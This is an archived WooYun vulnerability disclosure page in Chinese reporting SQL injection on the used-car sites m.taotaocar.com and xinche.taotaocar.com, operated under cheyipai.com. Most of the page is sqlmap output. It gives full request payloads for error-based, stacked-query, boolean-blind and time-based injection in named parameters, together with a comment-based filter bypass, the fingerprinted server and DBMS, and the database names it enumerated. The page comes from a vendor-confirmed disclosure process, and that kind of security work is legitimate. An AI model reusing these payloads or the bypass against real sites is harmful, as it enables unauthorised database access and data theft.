当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-096053

漏洞标题:车易拍SQL注射(二)

相关厂商:cheyipai.com

漏洞作者: 紫霞仙子

提交时间:2015-02-07 12:52

修复时间:2015-03-24 12:54

公开时间:2015-03-24 12:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-07: 细节已通知厂商并且等待厂商处理中
2015-02-09: 厂商已经确认,细节仅向厂商公开
2015-02-19: 细节向核心白帽子及相关领域专家公开
2015-03-01: 细节向普通白帽子公开
2015-03-11: 细节向实习白帽子公开
2015-03-24: 细节向公众公开

简要描述:

233

详细说明:

发现个问题,你们修SQL注入的方法不完善,可能很容易的绕过,刚才把你们的SQL漏洞跑了一遍,除了关站的其他几乎全能绕过。
payload:空格替换为/**/

漏洞证明:

http://m.taotaocar.com:80/paimai/index.aspx (POST)
__VIEWSTATE=/wEPDwUJMTE0NzQxODc1D2QWAgIDD2QWBAICDxYCHgtfIUl0ZW1Db3VudAIIFhBmD2QWAmYPFQsPSFowMTIwMTI5MDkzMjEyBDIwMDkCMTAR5LiA5rG95aWl6L%2BqLUE2TCAPSFowMTIwMTI5MDkzMjEyS2h0dHA6Ly91cDIwMTAudGFvdGFvY2FyLmNvbS9VcGxvYWRGaWxlMjAxMC8yMDEyLzktOS8xMjk5MTIzMDEyODY2NDRfbWlkLmpwZxHkuIDmsb3lpaXov6otQTZMIAkyODAwMDAuMDAJ5bey57uT5p2fBuS4quS6ugbmna3lt55kAgEPZBYCZg8VCw9IWjAxMjAxMjkwOTMyMTEEMjAwNgIwMRjkuJzljZct6I%2Bx5biFLUVYaeaJi%2BWKqCAPSFowMTIwMTI5MDkzMjExS2h0dHA6Ly91cDIwMTAudGFvdGFvY2FyLmNvbS9VcGxvYWRGaWxlMjAxMC8yMDEyLzktOS8xMjk5MTIxMTU1MTQ1MTlfbWlkLmpwZxjkuJzljZct6I%2Bx5biFLUVYaeaJi%2BWKqCAIMzUwMDAuMDAJ5bey57uT5p2fBuS4quS6ugbmna3lt55kAgIPZBYCZg8VCw9IWjAxMjAxMjkwNzMyMTAEMjAwNQIxMhjkuJzljZct6I%2Bx5YqoLeixquWNjuWeiyAPSFowMTIwMTI5MDczMjEwS2h0dHA6Ly91cDIwMTAudGFvdGFvY2FyLmNvbS9VcGxvYWRGaWxlMjAxMC8yMDEyLzktNy8xMjk3MTY1MjQ4NjE5NTVfbWlkLmpwZxjkuJzljZct6I%2Bx5YqoLeixquWNjuWeiyAIMzkwMDAuMDAJ5bey57uT5p2fBuS4quS6ugbmna3lt55kAgMPZBYCZg8VCw9IWjAxMjAxMjkwNzMyMDkEMjAwMgIxMCDkuIDmsb3lpKfkvJct5o236L6%2BLTAwLTAy5qy%2BQ0lYIA9IWjAxMjAxMjkwNzMyMDlKaHR0cDovL3VwMjAxMC50YW90YW9jYXIuY29tL1VwbG9hZEZpbGUyMDEwLzIwMTIvOS03LzEyOTcxNjQ3MTkyMDg2X21pZC5qcGcg5LiA5rG95aSn5LyXLeaNt%2Bi%2Bvi0wMC0wMuasvkNJWCAIMTkwMDAuMDAJ5bey57uT5p2fBuS4quS6ugbmna3lt55kAgQPZBYCZg8VCw9IWjAxMjAxMjkwNzMyMDgEMjAwMAIxMijkuIrmtbflpKfkvJct5qGR5aGU57qzMjAwMC3ml7bku6PpqoTlrZAgD0haMDEyMDEyOTA3MzIwOEtodHRwOi8vdXAyMDEwLnRhb3Rhb2Nhci5jb20vVXBsb2FkRmlsZTIwMTAvMjAxMi85LTcvMTI5NzE2NTQzODgyNzc0X21pZC5qcGco5LiK5rW35aSn5LyXLeahkeWhlOe6szIwMDAt5pe25Luj6aqE5a2QIAgxNzAwMC4wMAnlt7Lnu5PmnZ8G5Liq5Lq6BuadreW3nmQCBQ9kFgJmDxULD0haMDEyMDEyOTA3MzIwNwQyMDA2AjAxK%2BWMl%2BS6rOeOsOS7oy3kvIrlhbDnibktMS42TOiHquWKqOixquWNjuWeiyAPSFowMTIwMTI5MDczMjA3S2h0dHA6Ly91cDIwMTAudGFvdGFvY2FyLmNvbS9VcGxvYWRGaWxlMjAxMC8yMDEyLzktNy8xMjk3MTYzNjMzNDY2OTVfbWlkLmpwZyvljJfkuqznjrDku6Mt5LyK5YWw54m5LTEuNkzoh6rliqjosarljY7lnosgCDQ0MDAwLjAwCeW3sue7k%2BadnwbkuKrkuroG5p2t5beeZAIGD2QWAmYPFQsPSFowMTIwMTI5MDYzMjA2BDIwMDgCMDkw5YyX5Lqs546w5LujLeS8iuWFsOeJueaCpuWKqC0xLjboh6rliqjosarljY7lnosgD0haMDEyMDEyOTA2MzIwNktodHRwOi8vdXAyMDEwLnRhb3Rhb2Nhci5jb20vVXBsb2FkRmlsZTIwMTAvMjAxMi85LTYvMTI5NjE3MjEyMDk3NzE3X21pZC5qcGcw5YyX5Lqs546w5LujLeS8iuWFsOeJueaCpuWKqC0xLjboh6rliqjosarljY7lnosgCDYzMDAwLjAwCeW3sue7k%2Badnwnnu4/plIDllYYG5p2t5beeZAIHD2QWAmYPFQsPSFowMTIwMTI5MDYzMjA1BDIwMDECMTAt5LiK5rW35aSn5LyXLeahkeWhlOe6sy3kuJbnuqrmlrDnp4Dln7rmnKzlnosgD0haMDEyMDEyOTA2MzIwNUtodHRwOi8vdXAyMDEwLnRhb3Rhb2Nhci5jb20vVXBsb2FkRmlsZTIwMTAvMjAxMi85LTYvMTI5NjE3MjQyMzcxMzAwX21pZC5qcGct5LiK5rW35aSn5LyXLeahkeWhlOe6sy3kuJbnuqrmlrDnp4Dln7rmnKzlnosgCDEzMDAwLjAwCeW3sue7k%2BadnwbkuKrkuroG5p2t5beeZAIDDw8WAh4LUmVjb3JkY291bnQCfWRkZHypEqeo02g2jhIUdnKY4WF7aUwz&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWAgLi0q%2B%2BBwL0nNqKDN1djBqCarXZ2F%2Bfyfjet/6lcHLP&car_is_sale=0&car_moneyb=0&usertype=%E4%B8%AA%E4%BA%BA&car_money=1%E4%B8%87%E4%BB%A5%E4%B8%8B&keywords=12&Btn_seach=%E6%90%9C%E7%B4%A2
---
Parameter: car_is_sale (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUJMTE0NzQxODc1DxYMHgtjYXJfaXNfc2FsZQUBMB4JY2FyX21vbmV5BQox5LiH5Lul5LiLHgpjYXJfbW9uZXliBQEwHghrZXl3b3JkcwUCMTIeCHVzZXJ0eXBlBQbkuKrkuroeCHdoZXJlU3RyBZMBIGFuZCBldGltZT5nZXRkYXRlKCkgYW5kIGNhcl9pc19zYWxlPTAgYW5kIGNhcl9tb25leWI+MCBhbmQgdXNlcnR5cGU9J+S4quS6uicgYW5kIGNhcl9tb25leTw9MTAwMDAgYW5kIChrZXl3b3JkcyBsaWtlICclMTIlJyBvciBqY2FyaWQgbGlrZSAnJTEyJScpFgICAw9kFgQCAg8WAh4LXyFJdGVtQ291bnRmZAIDDw8WAh4LUmVjb3JkY291bnRmZGRkdTTY8E6LWSweLSE2EQJA6MnJWAY=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWAgLSq8K8CQL0nNqKDIeMR3Q8zuWOA6wRYJGUcrvTrzMu&car_is_sale=0' AND 4516=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (4516=4516) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(113))) AND 'kDNv'='kDNv&car_moneyb=0&usertype=%E4%B8%AA%E4%BA%BA&car_money=1%E4%B8%87%E4%BB%A5%E4%B8%8B&keywords=12&Btn_seach=%E6%90%9C%E7%B4%A2
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUJMTE0NzQxODc1DxYMHgtjYXJfaXNfc2FsZQUBMB4JY2FyX21vbmV5BQox5LiH5Lul5LiLHgpjYXJfbW9uZXliBQEwHghrZXl3b3JkcwUCMTIeCHVzZXJ0eXBlBQbkuKrkuroeCHdoZXJlU3RyBZMBIGFuZCBldGltZT5nZXRkYXRlKCkgYW5kIGNhcl9pc19zYWxlPTAgYW5kIGNhcl9tb25leWI+MCBhbmQgdXNlcnR5cGU9J+S4quS6uicgYW5kIGNhcl9tb25leTw9MTAwMDAgYW5kIChrZXl3b3JkcyBsaWtlICclMTIlJyBvciBqY2FyaWQgbGlrZSAnJTEyJScpFgICAw9kFgQCAg8WAh4LXyFJdGVtQ291bnRmZAIDDw8WAh4LUmVjb3JkY291bnRmZGRkdTTY8E6LWSweLSE2EQJA6MnJWAY=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWAgLSq8K8CQL0nNqKDIeMR3Q8zuWOA6wRYJGUcrvTrzMu&car_is_sale=0'; WAITFOR DELAY '0:0:5'--&car_moneyb=0&usertype=%E4%B8%AA%E4%BA%BA&car_money=1%E4%B8%87%E4%BB%A5%E4%B8%8B&keywords=12&Btn_seach=%E6%90%9C%E7%B4%A2
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwUJMTE0NzQxODc1DxYMHgtjYXJfaXNfc2FsZQUBMB4JY2FyX21vbmV5BQox5LiH5Lul5LiLHgpjYXJfbW9uZXliBQEwHghrZXl3b3JkcwUCMTIeCHVzZXJ0eXBlBQbkuKrkuroeCHdoZXJlU3RyBZMBIGFuZCBldGltZT5nZXRkYXRlKCkgYW5kIGNhcl9pc19zYWxlPTAgYW5kIGNhcl9tb25leWI+MCBhbmQgdXNlcnR5cGU9J+S4quS6uicgYW5kIGNhcl9tb25leTw9MTAwMDAgYW5kIChrZXl3b3JkcyBsaWtlICclMTIlJyBvciBqY2FyaWQgbGlrZSAnJTEyJScpFgICAw9kFgQCAg8WAh4LXyFJdGVtQ291bnRmZAIDDw8WAh4LUmVjb3JkY291bnRmZGRkdTTY8E6LWSweLSE2EQJA6MnJWAY=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWAgLSq8K8CQL0nNqKDIeMR3Q8zuWOA6wRYJGUcrvTrzMu&car_is_sale=0' WAITFOR DELAY '0:0:5'--&car_moneyb=0&usertype=%E4%B8%AA%E4%BA%BA&car_money=1%E4%B8%87%E4%BB%A5%E4%B8%8B&keywords=12&Btn_seach=%E6%90%9C%E7%B4%A2
Parameter: usertype (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUJMTE0NzQxODc1DxYMHgtjYXJfaXNfc2FsZQUBMB4JY2FyX21vbmV5BQox5LiH5Lul5LiLHgpjYXJfbW9uZXliBQEwHghrZXl3b3JkcwUCMTIeCHVzZXJ0eXBlBQbkuKrkuroeCHdoZXJlU3RyBZMBIGFuZCBldGltZT5nZXRkYXRlKCkgYW5kIGNhcl9pc19zYWxlPTAgYW5kIGNhcl9tb25leWI+MCBhbmQgdXNlcnR5cGU9J+S4quS6uicgYW5kIGNhcl9tb25leTw9MTAwMDAgYW5kIChrZXl3b3JkcyBsaWtlICclMTIlJyBvciBqY2FyaWQgbGlrZSAnJTEyJScpFgICAw9kFgQCAg8WAh4LXyFJdGVtQ291bnRmZAIDDw8WAh4LUmVjb3JkY291bnRmZGRkdTTY8E6LWSweLSE2EQJA6MnJWAY=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWAgLSq8K8CQL0nNqKDIeMR3Q8zuWOA6wRYJGUcrvTrzMu&car_is_sale=0&car_moneyb=0&usertype=-8016' OR (2970=2970) AND 'WeeK'='WeeK&car_money=1%E4%B8%87%E4%BB%A5%E4%B8%8B&keywords=12&Btn_seach=%E6%90%9C%E7%B4%A2
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUJMTE0NzQxODc1DxYMHgtjYXJfaXNfc2FsZQUBMB4JY2FyX21vbmV5BQox5LiH5Lul5LiLHgpjYXJfbW9uZXliBQEwHghrZXl3b3JkcwUCMTIeCHVzZXJ0eXBlBQbkuKrkuroeCHdoZXJlU3RyBZMBIGFuZCBldGltZT5nZXRkYXRlKCkgYW5kIGNhcl9pc19zYWxlPTAgYW5kIGNhcl9tb25leWI+MCBhbmQgdXNlcnR5cGU9J+S4quS6uicgYW5kIGNhcl9tb25leTw9MTAwMDAgYW5kIChrZXl3b3JkcyBsaWtlICclMTIlJyBvciBqY2FyaWQgbGlrZSAnJTEyJScpFgICAw9kFgQCAg8WAh4LXyFJdGVtQ291bnRmZAIDDw8WAh4LUmVjb3JkY291bnRmZGRkdTTY8E6LWSweLSE2EQJA6MnJWAY=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWAgLSq8K8CQL0nNqKDIeMR3Q8zuWOA6wRYJGUcrvTrzMu&car_is_sale=0&car_moneyb=0&usertype=%E4%B8%AA%E4%BA%BA' AND 6637=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (6637=6637) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(113))) AND 'qgEx'='qgEx&car_money=1%E4%B8%87%E4%BB%A5%E4%B8%8B&keywords=12&Btn_seach=%E6%90%9C%E7%B4%A2
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUJMTE0NzQxODc1DxYMHgtjYXJfaXNfc2FsZQUBMB4JY2FyX21vbmV5BQox5LiH5Lul5LiLHgpjYXJfbW9uZXliBQEwHghrZXl3b3JkcwUCMTIeCHVzZXJ0eXBlBQbkuKrkuroeCHdoZXJlU3RyBZMBIGFuZCBldGltZT5nZXRkYXRlKCkgYW5kIGNhcl9pc19zYWxlPTAgYW5kIGNhcl9tb25leWI+MCBhbmQgdXNlcnR5cGU9J+S4quS6uicgYW5kIGNhcl9tb25leTw9MTAwMDAgYW5kIChrZXl3b3JkcyBsaWtlICclMTIlJyBvciBqY2FyaWQgbGlrZSAnJTEyJScpFgICAw9kFgQCAg8WAh4LXyFJdGVtQ291bnRmZAIDDw8WAh4LUmVjb3JkY291bnRmZGRkdTTY8E6LWSweLSE2EQJA6MnJWAY=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWAgLSq8K8CQL0nNqKDIeMR3Q8zuWOA6wRYJGUcrvTrzMu&car_is_sale=0&car_moneyb=0&usertype=%E4%B8%AA%E4%BA%BA'; WAITFOR DELAY '0:0:5'--&car_money=1%E4%B8%87%E4%BB%A5%E4%B8%8B&keywords=12&Btn_seach=%E6%90%9C%E7%B4%A2
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwUJMTE0NzQxODc1DxYMHgtjYXJfaXNfc2FsZQUBMB4JY2FyX21vbmV5BQox5LiH5Lul5LiLHgpjYXJfbW9uZXliBQEwHghrZXl3b3JkcwUCMTIeCHVzZXJ0eXBlBQbkuKrkuroeCHdoZXJlU3RyBZMBIGFuZCBldGltZT5nZXRkYXRlKCkgYW5kIGNhcl9pc19zYWxlPTAgYW5kIGNhcl9tb25leWI+MCBhbmQgdXNlcnR5cGU9J+S4quS6uicgYW5kIGNhcl9tb25leTw9MTAwMDAgYW5kIChrZXl3b3JkcyBsaWtlICclMTIlJyBvciBqY2FyaWQgbGlrZSAnJTEyJScpFgICAw9kFgQCAg8WAh4LXyFJdGVtQ291bnRmZAIDDw8WAh4LUmVjb3JkY291bnRmZGRkdTTY8E6LWSweLSE2EQJA6MnJWAY=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWAgLSq8K8CQL0nNqKDIeMR3Q8zuWOA6wRYJGUcrvTrzMu&car_is_sale=0&car_moneyb=0&usertype=%E4%B8%AA%E4%BA%BA' WAITFOR DELAY '0:0:5'--&car_money=1%E4%B8%87%E4%BB%A5%E4%B8%8B&keywords=12&Btn_seach=%E6%90%9C%E7%B4%A2
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2012
available databases [8]:
[*] 2dazi
[*] master
[*] model
[*] msdb
[*] taocar_db_122
[*] tempdb
[*] test
[*] xcnews
-----------------------------------
http://xinche.taotaocar.com/xinche/quanguobaojia.aspx?classid=161011001
Parameter: classid (GET)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
    Payload: classid=161011001'; IF(5896=5896) SELECT 5896 ELSE DROP FUNCTION kNRt--
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: classid=161011001' AND 7121=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (7121=7121) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(112)+CHAR(106)+CHAR(113))) AND 'YJEc'='YJEc
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: classid=161011001'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: classid=161011001' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2012
available databases [8]:
[*] 2dazi
[*] master
[*] model
[*] msdb
[*] taocar_db_122
[*] tempdb
[*] test
[*] xcnews

修复方案:

重新设计修复方法。

版权声明:转载请注明来源 紫霞仙子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-02-09 16:08

厂商回复:

已开始排查,感谢提交

最新状态:

暂无